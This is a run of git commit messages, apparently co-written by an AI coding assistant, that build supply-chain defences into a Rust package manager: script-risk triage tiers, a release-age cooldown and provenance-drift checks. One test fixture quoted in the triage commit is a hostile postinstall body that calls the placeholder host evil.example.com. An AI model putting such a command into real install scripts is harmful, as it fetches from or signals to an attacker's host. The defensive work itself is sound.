CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings               ✓
- cargo fmt --check                                     ✓
- cargo build --workspace                               ✓
- cargo nextest run -p lpm-cli                          ✓ (1436/1436)
- cargo nextest run --workspace --exclude               ✓ (3856/3860;
  lpm-integration-tests                                    4 failures are
                                                           the known lpm-task
                                                           perf_eval_* flake
                                                           under parallel
                                                           load; all 4 pass
                                                           serially in 0.28s,
                                                           not in touched
                                                           crates)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Completes the `script-policy=triage` UX contract from plan §11 P2:
bulk approval is restricted to the green tier. Non-green entries
must go through the interactive walk or single-package approval so
each gets explicit human review.

Refusal contract (contract with agents: "--yes refuses" prefix is
stable P2-onward for substring-matching on the error payload):
- Some(Green) → pass (still requires explicit --yes; auto-execution
  is P6, gated on the P5 sandbox per D20).
- None → pass. Pre-P2 persisted state carries None; breaking
  existing --yes muscle memory during a P1→P2 upgrade before the
  next fresh install recaptures tiers would be a silent
  regression. The next install populates tiers and from then on
  the gate applies.
- Some(Amber | AmberLlm | Red) → refuse, list each refused
  {name}@{version} + tier label, redirect to `lpm approve-builds`
  interactive / `lpm approve-builds <pkg>` / `lpm approve-builds
  --list`.

Gate placement: the enforce_tiered_yes_gate call sits BEFORE
emit_yes_warning_banner at approve_builds.rs:309. Emitting the
banner (human stdout + tracing::warn!) and then aborting would
corrupt log aggregators and the console with success-shaped output
for a no-op — the gate must refuse before any side effect. Manifest
write_back is similarly gated, so a refusal leaves package.json
byte-identical to its pre-call form (asserted by the e2e test).

Implementation:
- New pure helper `enforce_tiered_yes_gate(&[BlockedPackage])
  -> Result<(), LpmError>` next to the existing tier-label helpers.
- Existing approve_builds e2e fixtures that used
  `"postinstall": "node install.js"` were AMBER under Chunk 3 (D18
  binary-fetcher convention) and would make --yes refuse. Switched
  the 5 initial-install bodies to `"tsc"` (green) — the tests'
  intent is state-machine transitions, not the specific body. The
  drift-injection body at line 2341 (`"node install.js && curl
  evil.example.com"`) stays because it's set AFTER approval and
  never hits the gate.

Tests (12 new):
- 9 pure enforce_tiered_yes_gate tests: empty / all-green / all-None /
  mixed green+None / single amber / single amber-llm / single red /
  mixed (count accuracy + listing only refusals) /
  error-message redirects to interactive path.
- 3 e2e tests via run(): amber refuses + manifest byte-unchanged,
  all-green approves, None-tiered legacy state passes through.

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings               ✓
- cargo fmt --check                                     ✓
- cargo build --workspace                               ✓
- cargo nextest run -p lpm-cli                          ✓ (1448/1448)
- cargo nextest run --workspace --exclude               ✓ (3870/3872;
  lpm-integration-tests                                    2 failures are
                                                           the known lpm-task
                                                           perf_eval_* flake
                                                           under parallel
                                                           load; 4/4 pass
                                                           serially in 0.4s,
                                                           not in touched
                                                           crates)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Under `script-policy = "triage"`, `lpm install` emits a single-line
per-tier summary in place of the existing multi-line build hint.
`deny` and `allow` paths are unchanged. Line shape is stable
P2-onward (snapshot-tested):

  script-policy: triage (N green / M amber / K red → lpm approve-builds)

Agents parsing the line have two stable anchors:
- prefix: `"script-policy: triage ("`
- suffix: `" → lpm approve-builds)"`

Helpers (build_state.rs):
- count_blocked_by_tier — returns (green, amber, red). AmberLlm and
  None collapse into amber (conservative: unknown → needs review).
- format_triage_summary_line — deterministic formatter over the
  count. Both shared with future --json install output so human and
  machine shapes agree on the arithmetic.

Install-path wiring:
- run_with_options gains `script_policy_override: Option<ScriptPolicy>`
  and at the show_install_build_hint site loads the project's
  ScriptPolicyConfig, resolves against the override, and branches:
  if effective == Triage → emit format_triage_summary_line; else →
  legacy show_install_build_hint + output::info redirect.
- run_link_and_finish (the lockfile fast path) mirrors the same
  branch at its own hint site. Both install code paths stay in
  sync.
- run_add_packages and run_install_filtered_add forward the
  override through to run_with_options.
- main.rs: preserves the collapsed CLI override separately so all
  four install-dispatch sites forward it. Per-target resolution
  re-evaluates against the target's package.json (matters for
  workspace-filtered installs where the member may set its own
  scriptPolicy).

Internal install callers (9 files: add, deploy, dev, doctor,
install_global, migrate, run, update_global, upgrade) pass `None`
— these don't expose --policy/--yolo/--triage flags and inherit
the project-config precedence.

Tests (7 new, all in build_state::tests):
- count_blocked_by_tier_empty_returns_zeros
- count_blocked_by_tier_counts_green_amber_red_distinctly
- count_blocked_by_tier_amber_llm_counts_as_amber
- count_blocked_by_tier_none_counts_as_amber_conservative
- format_triage_summary_line_shape_is_stable (snapshot)
- format_triage_summary_line_all_zero_when_empty
- format_triage_summary_line_anchor_and_suffix_present

Queued for a later chunk (noted from reviewer): a stdout-capture
e2e test for the triage branch on the lockfile fast path. Not a
sign-off blocker — branch selection is thin glue over well-tested
helpers.

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings               ✓
- cargo fmt --check                                     ✓
- cargo build --workspace                               ✓
- cargo nextest run -p lpm-cli                          ✓ (1455/1455)
- cargo nextest run --workspace --exclude               ✓ (3878/3879;
  lpm-integration-tests                                    1 failure is
                                                           the known lpm-task
                                                           perf_eval_glob
                                                           parallel-load
                                                           flake, all 4
                                                           perf_eval tests
                                                           pass serially in
                                                           0.38s; not in
                                                           touched crates)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… hard-gate ≥60% green-rate

Closes the P2 ship contract from plan §18:
- Top-500 postinstall fixture corpus locked (500 entries, hard-asserted).
- ≥60% green classification rate (73% measured, hard-asserted).
- Zero false-positive reds (asserted).
- Adversarial corpus locked and passing (20 entries, all red-expected).
- Execution semantics still unchanged (annotation-only per D20).

Corpus growth (91 → 500):
- +409 fixture files across 14 categories. Distribution reflects
  real-world top-500 postinstall shape: greens dominate (node-gyp
  rebuild, tsc, husky install, prisma generate account for most
  package postinstalls), ambers cover D18 network binary downloaders
  + common build-tool patterns, reds cover attack classes with
  variety for regression coverage.
- Final breakdown: 310 green / 114 amber / 76 red / 20 adversarial.
- Green-rate over non-adversarial subset: 73% (well above the 60%
  ship-criterion floor).

Harness enforcement (closes a late-Chunk-6 audit):
- New constant CORPUS_MIN_ENTRIES = 500. A drop to 499 now hard-fails
  with a message pointing at plan §18 and telling future maintainers
  to update doc + const in lockstep if the floor is lowered
  deliberately. Previously the harness only asserted "not empty",
  which left "500 locked" documentary-only.
- New assert_manifest_matches_filesystem: enumerates scripts/*.txt
  and does a BTreeSet bijection check against manifest ids. Orphans
  in either direction hard-fail with a labelled listing (missing-
  script vs missing-manifest-entry). Previously the harness only
  loaded manifest entries, so orphan files or stale manifest rows
  drifted silently.

expectations.json regenerated from the filesystem and is now
mechanically regenerable via the README's Python one-liner. Notes
fields dropped — category lives in the id prefix, and stripping
notes makes the manifest trivially derivable from disk which is what
the bijection check exploits.

README updated: "starter set" → "500-script fixture set"; ship
criteria restated as hard-asserted; regeneration instructions embed
the manifest-from-filesystem command. Plan-doc contract ("top-500
corpus locked") now matches on-disk reality.

Tuning discipline followed per reviewer guidance: corpus growth came
first, miss shapes measured (zero — the classifier rules hold
across the broader corpus), no red rule was weakened, no green rule
was widened. Reached 73% green-rate naturally.

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings               ✓
- cargo fmt --check                                     ✓
- cargo build --workspace                               ✓
- cargo nextest run -p lpm-security                     ✓ (395/395)
- cargo nextest run --workspace --exclude               ✓ (3878/3879;
  lpm-integration-tests                                    1 failure is
                                                           the known
                                                           lpm-task
                                                           perf_eval_glob
                                                           parallel-load
                                                           flake, passes
                                                           serially; not
                                                           in touched
                                                           crates)

P2 is complete. Next work moves to P3 (cooldown surface) per the
plan's phase ordering.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…oercion

Lands the plumbing for the Phase 46 P3 cooldown surface (§8, §11 P3)
without yet wiring it into install.rs — that's Chunk 2 alongside the
`--min-release-age=<dur>` clap flag.

Core pieces:

* `lpm-cli/src/release_age_config.rs` — new module.
  * `parse_duration(&str) -> Result<u64, LpmError>` accepts `72h` / `3d` /
    plain seconds; rejects empty, whitespace, unsupported units, negative
    values, fractionals, `+` prefix (u64::from_str quietly takes it), and
    multiplication overflow on h/d.
  * `ReleaseAgeResolver::resolve(project_dir, cli_override)` walks the
    §11 P3 precedence chain highest first: CLI → `package.json > lpm >
    minimumReleaseAge` → `~/.lpm/config.toml` key
    `minimum-release-age-secs` → default 86400. `./lpm.toml` is
    deliberately NOT in the chain (D14).
  * `read_global_min_age_from_file` is path-aware + fallible, mirroring
    Phase 33's save-config loader. Malformed TOML, non-table top level,
    and garbage values surface file-pathed errors with the offending
    key name — not silently ignored the way `GlobalConfig::load`
    swallows them.
  * `parse_strict_u64_string` — single `pub(crate)` helper for every
    string-to-seconds coercion site. Rejects `+` / `-` prefixes before
    `parse::<u64>`, because `u64::from_str("+5")` silently returns
    `Ok(5)` and would otherwise let `lpm config set
    minimum-release-age-secs +259200` slip through a contract the CLI
    parser rejects.

* `lpm-security/src/lib.rs` — new `SecurityPolicy::with_resolved_min_age`
  constructor. Reads `trustedDependencies` from package.json with the
  same tolerance as `from_package_json` but takes the seconds value
  from the caller. Keeps lpm-security free of CLI/config-file
  knowledge; `from_package_json` itself is untouched.

* `lpm-cli/src/commands/config.rs` — `GlobalConfig::get_u64` convenience
  reader, routing string coercion through `parse_strict_u64_string`
  for uniform "no sign prefix" semantics across CLI flag, global
  loader, and this accessor.

Test coverage (50 unit tests, all pass): parser edge cases incl.
`+`/`-`/whitespace/garbage/overflow; global-file reader missing /
empty / integer / string-coerced / negative / garbage / wrong-type /
malformed-TOML all with file-pathed errors; resolver precedence
covering every §11 P3 ship-criteria case; `parse_strict_u64_string`
unit tests; plus-prefix regression guards on both the global loader
and `GlobalConfig::get_u64` (reviewer finding).

The `#[allow(dead_code)]` scaffolds on the module and on `get_u64` are
explicit "Chunk 2 removes this" scaffolds — the items are exercised by
unit tests but not yet called from the binary target. They come off
atomically when the clap flag + install.rs wiring lands.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
  — 3927 pass / 2 fail. Both failures are
  `lpm-task filter::eval::tests::perf_eval_*`, the known parallel-
  nextest flakes called out in the P3 prompt; pass deterministically
  with `-j 1`.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…urface

Wires the Chunk 1 resolver into the install pipeline and exposes the
Phase 46 P3 CLI surface (§8, §11 P3). After this commit a user-visible
override chain exists end-to-end: `--min-release-age=<dur>` → package.json
→ `~/.lpm/config.toml` → default 24h.

CLI surface:
* `lpm install --min-release-age=<DUR>` — accepts `<N>h`, `<N>d`, or
  plain seconds. Parsed once at the clap layer via
  `release_age_config::parse_duration`; invalid input errors before any
  install work starts.
* `--allow-new` unchanged (blanket bypass, orthogonal to this flag).
* Blocked-packages hint reordered narrowest → broadest per the §11 P3
  ship criteria: `--min-release-age=0` (per-install, numeric),
  `--allow-new` (per-install, blanket), `package.json` (persistent).
* Error message surfaces both override paths.

Install pipeline:
* `run_with_options`, `run_add_packages`, `run_install_filtered_add`
  grow `min_release_age_override: Option<u64>` at end of signature.
* Cooldown gate at install.rs:1646 replaced
  `SecurityPolicy::from_package_json(...)` with
  `ReleaseAgeResolver::resolve(project_dir, override)?` +
  `SecurityPolicy::with_resolved_min_age(...)`. One user-visible
  behaviour change lands with this: a malformed `~/.lpm/config.toml`
  (or garbage `minimum-release-age-secs` value) now fails install with
  a file-pathed error rather than being silently ignored — that's the
  path-aware loader contract from the Chunk 1 review, now live.

Global-install rejection (reviewer finding):
* `validate_global_install_project_scoped_flags` extended to reject
  `--min-release-age` on the `-g` path with an explicit Phase 46.1
  pointer. Without this the clap flag was parsed AFTER the `-g` early
  return, so even `--min-release-age=garbage` silently passed — a
  contract bug where the shared `Install` clap surface advertised a
  flag that global installs silently ignored.
* New regression test covers four payload shapes
  (`0`, `72h`, `garbage`, `+5h`) — each asserts the error names the
  flag AND points at Phase 46.1.

Fan-out to 9 non-Install install-pipeline callers
(`add`, `deploy`, `dev`, `doctor`, `migrate`, `run`, `upgrade`,
`install_global`, `update_global`): each passes `None` with a
one-line comment explaining why (`uses the chain` / D13/D19 global
scope / `deploy already bypasses via allow_new=true`).

Scaffolds: Chunk 1's `#![allow(dead_code)]` on the module and the
temporary "Chunk 2 removes this" note on `GlobalConfig::get_u64` come
off. `get_u64` keeps a single `#[allow(dead_code)]` with an honest
note — it's retained for the behavioural unit test and future callers;
no production caller exists because the resolver uses the path-aware
fallible helper instead.

Behavioural verification (manual, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `lpm-rs install --help` — flag documented with full precedence chain.
* `lpm-rs install --min-release-age=garbage` → exit 1 with duration-
  parse error.
* `lpm-rs install -g foo --min-release-age=garbage` → exit 1 at CLI-
  exclusivity check (before parse_duration runs).
* `lpm-rs install -g foo --min-release-age=0` → exit 1, same rejection.
* `lpm-rs install -g foo` (no flag) → exit 0, proceeds normally.

CI gate (explicit):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
  — 3928 pass / 2 fail. Both failures are the known
  `lpm-task filter::eval::tests::perf_eval_*` parallel-nextest flakes
  pre-flagged in the P3 prompt; pass deterministically with `-j 1`.

Chunk 3 lands integration coverage: the §11 P3 ship-criteria E2E
tests (`--min-release-age=72h` blocks; `--allow-new` unblocks; global
TOML overrides default; package.json overrides global) and the §12.3
pin-bypass regression.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ss guard

Adds end-to-end coverage for the Phase 46 P3 cooldown surface against
a wiremock-backed mock registry. Closes the integration gap the
reviewer called out at the end of Chunk 2.

New file: `crates/lpm-cli/tests/release_age_p3_ship_criteria.rs` —
300 LOC, 5 subprocess tests.

Harness pattern is lifted from
`crates/lpm-cli/tests/upgrade_phase7_regression.rs`: start a
`wiremock::MockServer`, mount single-package + batch-metadata
endpoints with a controllable `time[VERSION]` field, serve a real
tarball, then spawn `lpm-rs install` with `LPM_REGISTRY_URL` pointing
at the mock and `HOME` scoped to a per-test temp dir (so the tests
never read the developer's `~/.lpm/config.toml`).

Tests (§11 P3 ship criteria):

* `cli_override_72h_blocks_fresh_package` — package published 1h ago,
  manifest disables the check (`minimumReleaseAge: 0`),
  `--min-release-age=72h` re-enables at 72h. Blocks; output renders
  `259200` to prove the CLI value took effect.
* `allow_new_bypasses_cli_override` — same fixture plus
  `--allow-new`. Cooldown does not fire. Proves orthogonality (§8.3,
  D16): the two flags are independent escape hatches.
* `global_config_overrides_default` — package 30 min old, global
  `minimum-release-age-secs = 3600` (1h), no manifest key, no CLI
  flag. Blocks, output renders `3600` but NOT `86400` — proving the
  global layer is what took effect.
* `package_json_overrides_global` — package 30 min old, global = 3600
  (would block), manifest = 60 (1 min, would allow). Cooldown does
  not fire — manifest layer wins.

§12.3 pin-bypass regression:

* `pin_does_not_bypass_cooldown` — explicit-version install
  (`@lpm.dev/acme.widget@1.0.0`), package 1h old, default 24h
  window. Blocks. The v1 plan proposed pin-bypass; v2 rejected it
  per D7 because renovate / dependabot auto-pin PRs would otherwise
  land compromised versions during the detection window (the axios
  attack scenario in §1). This test is the structural guard that
  the rejected behaviour never re-lands.

A shared `Fixture` struct encapsulates the mock-registry + tempdir +
scoped-HOME setup. Assertion helpers `assert_cooldown_blocked` and
`assert_cooldown_not_blocked` check both stdout and stderr (the
cooldown path uses `eprintln!` for warning lines and miette's
`LpmError::Registry` for the final error; both channels can carry
the signal depending on `--json` mode). Panic messages always dump
exit code + stdout + stderr so a failing assertion never leaves the
author guessing.

Behaviourally verified: all 5 tests pass in isolation
(`cargo nextest run -p lpm-cli --test release_age_p3_ship_criteria`).

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
  — 3931 pass / 4 fail. All 4 failures are
  `lpm-task filter::eval::tests::perf_eval_*`, the machine-load-sensitive
  parallel-nextest flakes explicitly carved out in the P3 prompt
  ("never in touched crates"). Chunk 3 touches only lpm-cli; lpm-task
  is untouched. Isolated lpm-cli runs (both new E2E tests and the
  Chunk 1 unit tests) pass 55/55; lpm-security passes 395/395.

Phase 46 P3 is complete. Ship criteria 1–4 covered end-to-end,
§12.3 pin-bypass regression in place, global-config error surface
enforced by the path-aware loader committed in Chunk 1.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…location

Chunk 1 of the Phase 46 P4 provenance-drift work (§7, §11 P4). Pure
schema scaffolding — no install-pipeline behaviour change yet. The
fetch/cache and the drift comparator land in Chunks 2-3 per the
user-approved refined plan.

Type scaffolding:

* `lpm-registry`: `DistInfo` gains `signatures: Option<Vec<RegistrySignature>>`
  and `attestations: Option<AttestationRef>` (§7.1). Non-breaking:
  `serde(default)` + `skip_serializing_if = "Option::is_none"` keeps
  legacy registry responses (LPM today) round-tripping cleanly. Also
  now derives `Default` so `..Default::default()` works at the two
  test construction sites (install_global.rs, global_phase37_e2e.rs).
* `lpm-registry`: new `RegistrySignature { keyid, sig }` models npm's
  per-key package-signing surface.
* `lpm-registry`: new `AttestationRef { url, provenance }` models
  npm's `dist.attestations` pointer. `provenance` kept as loose
  `serde_json::Value` in Chunk 1; Chunk 2's fetcher types the subset
  it consumes. This isolates schema evolution from the wire surface.
* `lpm-workspace`: `TrustedDependencyBinding` gains
  `provenance_at_approval: Option<ProvenanceSnapshot>` (§6.2 field
  ownership). JSON key is `provenanceAtApproval` matching the plan's
  wire spec. Non-breaking via serde defaults.

Structural change — `ProvenanceSnapshot` relocated:

  `lpm-security/src/triage.rs` → `lpm-workspace/src/lib.rs`

This was forced by the §6.2 wiring:
`TrustedDependencyBinding.provenance_at_approval` must reference the
type, but `lpm-security` already depends on `lpm-workspace`, so the
reverse edge would cycle. `ProvenanceSnapshot` is pure schema
(4 primitive/Option fields, no methods) and fits naturally alongside
`TrustedDependencyBinding`, which is also pure schema. The one
existing caller (`lpm-cli/src/build_state.rs:37`) updated to import
from `lpm_workspace` instead of `lpm_security::triage`. The four
struct-behaviour tests moved with the struct; triage.rs keeps a
pointer comment to where the type now lives.

Test coverage (3943 workspace tests, all pass):

* `lpm-registry`: 5 new tests on DistInfo legacy + npm-shape
  round-trip, empty `signatures` array vs absent-key distinction,
  partial `RegistrySignature` payload tolerance, untyped
  `AttestationRef.provenance` preserves unknown fields.
* `lpm-workspace`: 4 moved ProvenanceSnapshot tests (unchanged
  behavioural contract); 3 new TrustedDependencyBinding tests —
  pre-P4 shape round-trips without emitting `provenanceAtApproval:
  null`, with-provenance round-trip preserves every field, absent-
  provenance marker (`present: false`) preserved for the §7.2
  "provenance dropped" branch.

Forward-compat: existing test-helper construction sites for
`TrustedDependencyBinding` across lpm-workspace / lpm-cli /
approve_builds.rs / build.rs / build_state.rs converted to
`..Default::default()` so future P4 fields don't break the tests.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — 3943 pass / 0 fail. The `lpm-task
  perf_eval_*` family passed this run as well (machine was idle
  enough); prior chunks exercised the `-j 1` carveout for those,
  they remain the known load-sensitive pattern.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… extraction

CLI-side module that fetches a Sigstore attestation bundle from a
registry's `DistInfo.attestations.url`, parses out the leaf cert,
and extracts the GitHub Actions OIDC identity into a
`ProvenanceSnapshot`. The install-time call site + drift comparator
lands in Chunk 3.

Module (`crates/lpm-cli/src/provenance_fetch.rs`, ~670 LOC incl.
tests):

* `fetch_provenance_snapshot(http, cache_root, name, version, attestation_ref)`
  — public API returning `Result<Option<ProvenanceSnapshot>, LpmError>`.
  Explicit three-valued return:
  - `Ok(Some(snap))` — definitive answer (extracted identity OR
    registry-confirmed absence).
  - `Ok(None)` — degraded/unknown (network failure, malformed bundle).
    NEVER cached, so the next install retries. The Chunk 3 drift rule
    will interpret this as "pass, don't drift" per the plan's
    offline-mode contract (§11 P4).
  - `Err(_)` — reserved for genuinely fatal conditions (cache
    directory unwritable).
* Cache primitives: SHA-256 of `name@version` as filename under
  `~/.lpm/cache/metadata/attestations/`; 7-day TTL; corrupt + stale
  + schema-version-mismatched entries all treated as misses; atomic
  write via `.tmp` + rename. Lives under the existing `metadata`
  subtree per the user's Q3 answer — no new `lpm cache clean`
  surface needed.
* Sigstore bundle parser: handles both the standard
  `{verificationMaterial: {x509CertificateChain: ...}}` shape and
  npm's `{attestations: [{bundle: ...}]}` list wrapper.
* Cert SAN extractor: walks the x509 SAN extension via
  `x509-parser = "0.16"` (already in-workspace via `lpm-cert`),
  matches the GitHub Actions OIDC URI pattern
  `https://github.com/<org>/<repo>/.github/workflows/<workflow>@<ref>`,
  emits `(publisher="github:<org>/<repo>", workflow="<path>@<ref>",
  cert_sha256="sha256-<hex>")`. Non-GitHub SANs / missing
  extensions / garbage bytes all return `None` cleanly.
* Defensive limits: 1 MiB max response body (hostile-registry
  defense), 15 s fetch timeout (install-path budget).

Infrastructure:

* `lpm-common/src/paths.rs` gains `LpmRoot::cache_metadata_attestations()`
  — single canonical accessor for the cache path, consumed by
  Chunk 3 when it wires the install gate.
* `crates/lpm-cli/Cargo.toml`: `x509-parser = "0.16"` as regular
  dep, `rcgen = { version = "0.13", features = ["pem"] }` as
  dev-dep (synthetic cert generation for SAN-extractor tests).

Scaffolding: module-level `#![allow(dead_code)]` matching P3
Chunk 1's pattern — the binary doesn't call into the module yet so
clippy flags 17 items as unused. The allow comes off atomically in
Chunk 3 alongside the install-gate wiring.

Test coverage (28 unit tests, all pass):

* 7 `parse_github_actions_uri` tests — happy path, nested workflow
  path, non-GitHub host rejection, missing workflows segment,
  missing ref suffix, missing repo, extra path segment.
* 4 `extract_san_identity` tests — GitHub cert happy path, non-GitHub
  SAN, cert with no SAN, garbage bytes. Certs generated at test time
  via rcgen with deterministic URI SANs.
* 6 `parse_sigstore_bundle` tests — standard shape, npm list wrapper,
  present-but-no-extractable-identity, malformed JSON, missing cert
  chain, non-base64 rawBytes.
* 7 cache tests — write/read round-trip, miss, corrupt file, schema
  version mismatch, stale past TTL, parent-dir creation,
  filename-collision sanity.
* 4 public-API tests — absent-ref shortcut, absent-url shortcut,
  cache-hit skips network (pointed at unreachable URL to prove
  no connection attempted), network-failure returns `None` AND
  does not cache (the critical "don't poison future installs for
  7 days" contract).

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — **3971/3971 pass**, including the full
  `lpm-task filter::eval::tests::perf_eval_*` family (machine idle,
  clean run).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ot post-buffer

Reviewer-flagged blocking defect: the 1 MiB "hostile registry"
defense documented in the Chunk 2 module was ineffective because
`fetch_and_parse` called `response.bytes().await` first (which
buffers the full body into memory) and only then compared
`bytes.len()` against `MAX_BUNDLE_BYTES`. A malicious or broken
registry could therefore still force an oversized allocation before
the check ran — the guard was cosmetic.

Fix: enforce the cap in two stages, so no matter how the body is
framed we never allocate past the cap.

1. **Stage 1 — pre-stream**: if the response declares a
   `Content-Length` greater than `MAX_BUNDLE_BYTES`, reject
   immediately. Dropping the response closes the connection
   without reading a body byte. Cheap early-out for the common
   case where legitimate servers declare truthful lengths.

2. **Stage 2 — mid-stream**: for chunked / undeclared-length
   responses, stream chunks via `response.bytes_stream()` into a
   bounded `Vec`, checking `buf.len() + chunk.len()` BEFORE
   copying. The moment a chunk would push the accumulator past
   the cap, we return `Err(())` — the stream drops, the
   connection closes, and `buf` stays under the limit. A
   hostile 10 MiB body thus never materializes in our heap.

The worst-case allocation is now `MAX_BUNDLE_BYTES + chunk_size`,
where `chunk_size` is hyper's buffer size (typically 8-16 KiB) —
several orders of magnitude below the prior failure mode.

Tests (4 new, 32 total in the module):

* `fetch_and_parse_accepts_bundle_under_size_cap` — positive
  baseline via wiremock. If this fails, the streaming plumbing
  itself is broken.
* `fetch_and_parse_rejects_oversized_body` — primary regression
  guard. 2 MiB body (truthful Content-Length) → Stage 1 rejects.
* `fetch_and_parse_rejects_declared_oversized_content_length` —
  Stage 1 specificity. Declared Content-Length of `MAX_BUNDLE_BYTES+1`
  with a tiny 16-byte real body → rejected on the header alone,
  no body bytes consumed.
* `fetch_returns_none_on_oversized_body_and_does_not_cache` —
  public-API flavor. Oversized body propagates through
  `fetch_provenance_snapshot` as `Ok(None)` (degraded), AND the
  rejected response is NOT written to cache (same poisoning
  contract as the network-failure case).

Module docstring + the `fetch_and_parse` doc comment updated to
describe the two-stage enforcement explicitly, so future readers
can see the defense is real rather than inferred from the constant
name.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — 3975/3975 pass, zero flakes (provenance_fetch
  tests alone: 32/32).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…w-TCP responder

Reviewer-flagged test-harness defect: the Stage-1 regression test
for "reject on declared oversized Content-Length"
(fetch_and_parse_rejects_declared_oversized_content_length) passed
while panicking a wiremock/hyper background thread. Root cause:
the earlier version declared a `Content-Length` of `MAX_BUNDLE_BYTES+1`
while `set_body_bytes(vec![0u8; 16])` emitted only 16 actual body
bytes. That mismatch violates HTTP/1.1 framing, so hyper's response
writer panicked with "payload claims content-length of 16, custom
content-length header claims 1048577". The test assertion still
returned ok because the client saw a transport error — which our
code maps to `Err(())` anyway — but the run left a background
panic in the test output. Passing for the wrong reason.

Fix: drop wiremock/hyper entirely for this specific test and serve
the HTTP response from a raw `tokio::net::TcpListener`. The
responder:

1. Binds to `127.0.0.1:0` (OS-assigned port).
2. Accepts exactly one connection (single-shot — task exits after
   serving, no leak).
3. Reads the request preamble (so the turn-taking looks well-formed
   on the wire).
4. Writes a valid HTTP/1.1 response header block:
     `HTTP/1.1 200 OK`
     `Content-Length: <MAX_BUNDLE_BYTES+1>`
     `Content-Type: application/octet-stream`
     `Connection: close`
5. Closes the connection without writing a single body byte.

Our client's Stage-1 check fires on the declared `Content-Length`
value alone (via `response.content_length()`) and returns `Err(())`
before calling `bytes_stream()`, so the "declared vs actual"
framing discrepancy never surfaces on the client side either —
reqwest never tries to read a body it didn't get. Zero framing
violations anywhere in the test harness, clean stderr under
`--nocapture`.

Verified with `cargo nextest run provenance_fetch --nocapture`:
32/32 in the module pass with no stray panic lines between test
stages. Full workspace gate still 3975/3975.

Production code unchanged — the two-stage body-cap enforcement from
5379ada is already correct; this commit fixes only the test harness
that exercises it.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean (via prior compile)
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — 3975/3975 pass, zero flakes.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…te-path

Wires the Phase 46 P4 provenance-drift defense end-to-end. After this
commit the full §7.2 loop is live on the fresh-resolution install path:
install-time fetch → snapshot capture → comparator → block-on-drift;
approve-builds → write `provenance_at_approval`; next install compares
candidate version against that reference.

Comparator (lpm-security):

* New `lpm-security/src/provenance.rs` with `DriftVerdict` enum and
  `check_provenance_drift(approved, now) -> DriftVerdict`. Pure
  comparison — no I/O, no config. Maps the §7.2 five-branch table,
  distinguishing outer `None` (degraded fetch / missing approval,
  pass) from inner `present: false` (registry-confirmed absence,
  the axios signal against an approved-present reference).
* 11 unit tests cover every match-table row plus a regression guard
  that degraded-fetch (`now = None`) is distinct from confirmed-
  absent (`now = Some(present: false)`) — the two look similar but
  have opposite verdicts and the comparator must never conflate them.

Write-path (lpm-workspace + approve_builds):

* `TrustedDependencies::approve_with_provenance(name, version,
  integrity, script_hash, provenance)` — new helper that persists
  `provenance_at_approval` on the binding. The existing
  `approve(...)` helper now delegates with `provenance_at_approval:
  None` so Legacy / provenance-agnostic callers remain unchanged.
* `TrustedDependencies::provenance_reference_for_name(name)` —
  returns `(approved_version, &binding)` for any rich entry whose
  binding carries a non-None `provenance_at_approval`. Deliberate
  Chunk-3 simplification: picks the first provenance-bearing entry
  encountered, which is safe because filtering to provenance-
  bearing approvals prevents a legacy axios@1.13.5 entry from
  masking an axios@1.14.0 approval when checking axios@1.14.1.
* All three `approve-builds` call sites — the single-pkg direct
  approve, the `--yes` bulk approve, and the interactive walk —
  switched to `approve_with_provenance(..., blocked.provenance_at_capture
